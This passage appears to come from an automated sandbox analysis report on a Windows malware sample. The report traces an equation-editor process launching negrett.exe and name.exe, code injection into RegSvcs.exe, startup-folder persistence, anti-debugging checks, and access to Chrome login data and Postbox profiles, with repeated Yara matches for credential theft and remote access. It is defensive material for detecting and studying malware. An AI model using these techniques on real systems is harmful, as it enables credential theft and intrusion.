                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0105DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,8_2_0105DBBE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0102C2A2 FindFirstFileExW,8_2_0102C2A2
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0106698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,8_2_0106698F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010668EE FindFirstFileW,FindClose,8_2_010668EE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0105D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0105D076
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0105D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,8_2_0105D3A9
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0106979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_0106979D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01069642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,8_2_01069642
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01069B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,8_2_01069B2B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01065C97 FindFirstFileW,FindNextFileW,FindClose,8_2_01065C97
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0139DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_0139DBBE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0136C2A2 FindFirstFileExW,11_2_0136C2A2
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_013A698F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A68EE FindFirstFileW,FindClose,11_2_013A68EE
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0139D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0139D076
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0139D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_0139D3A9
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_013A979D
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_013A9642
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_013A9B2B
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013A5C97 FindFirstFileW,FindNextFileW,FindClose,11_2_013A5C97
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00B142DE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00410C4B _LocaleUpdate::_LocaleUpdate,__fileno,__isleadbyte_l,LdrInitializeThunk,__cftof,_strlen,__malloc_crt,__decode_pointer,__decode_pointer,__decode_pointer,__aulldvrm,_write_multi_char,_write_string,_write_multi_char,__cftof,_write_string,_write_string,_write_multi_char,9_2_00410C4B
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B8EAA2 BlockInput,5_2_00B8EAA2
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B42622
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,9_2_004019F0
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00B142DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03530715 mov edx, dword ptr fs:[00000030h]2_2_03530715
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029F40E8 mov eax, dword ptr fs:[00000030h]5_3_029F40E8
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B34CE8 mov eax, dword ptr fs:[00000030h]5_2_00B34CE8
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01014CE8 mov eax, dword ptr fs:[00000030h]8_2_01014CE8
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_00193580 mov eax, dword ptr fs:[00000030h]8_2_00193580
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_001935E0 mov eax, dword ptr fs:[00000030h]8_2_001935E0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_00191ED0 mov eax, dword ptr fs:[00000030h]8_2_00191ED0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01354CE8 mov eax, dword ptr fs:[00000030h]11_2_01354CE8
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_005535E0 mov eax, dword ptr fs:[00000030h]11_2_005535E0
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_00553580 mov eax, dword ptr fs:[00000030h]11_2_00553580
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_00551ED0 mov eax, dword ptr fs:[00000030h]11_2_00551ED0
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_00B70B62
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B309D5 SetUnhandledExceptionFilter,5_2_00B309D5
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B42622
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B3083F
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00B30C21
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_010109D5 SetUnhandledExceptionFilter,8_2_010109D5
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01022622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_01022622
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0101083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0101083F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01010C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_01010C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040CE09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0040E61C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00416F6A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004123F1 SetUnhandledExceptionFilter,9_2_004123F1
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_013509D5 SetUnhandledExceptionFilter,11_2_013509D5
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01362622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_01362622
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0135083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0135083F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01350C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_01350C21
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01051201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,8_2_01051201
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B52BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00B52BA5
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0105B226 SendInput,keybd_event,8_2_0105B226
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B922DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,5_2_00B922DA
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\negrett.exe C:\Users\user\AppData\Roaming\negrett.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe C:\Users\user\AppData\Roaming\negrett.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\user\AppData\Roaming\negrett.exeJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,5_2_00B70B62
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_01051663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_01051663
                  Source: EQNEDT32.EXE, 00000002.00000003.460812242.0000000007ECD000.00000004.00000020.00020000.00000000.sdmp, negrett.exe, 00000005.00000000.460870402.0000000000BD2000.00000002.00000001.01000000.00000004.sdmp, negrett.exe, 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: name.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_3_029EFA98 cpuid 5_3_029EFA98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,9_2_00417A20
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B4333F GetSystemTimeAsFileTime,5_2_00B4333F
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0104D27A GetUserNameW,8_2_0104D27A
                  Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 8_2_0102B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,8_2_0102B952
                  Source: C:\Users\user\AppData\Roaming\negrett.exeCode function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00B142DE
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                  Source: name.exeBinary or memory string: WIN_81
                  Source: name.exeBinary or memory string: WIN_XP
                  Source: name.exe.5.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: name.exeBinary or memory string: WIN_XPe
                  Source: name.exeBinary or memory string: WIN_VISTA
                  Source: name.exeBinary or memory string: WIN_7
                  Source: name.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1304, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2160, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
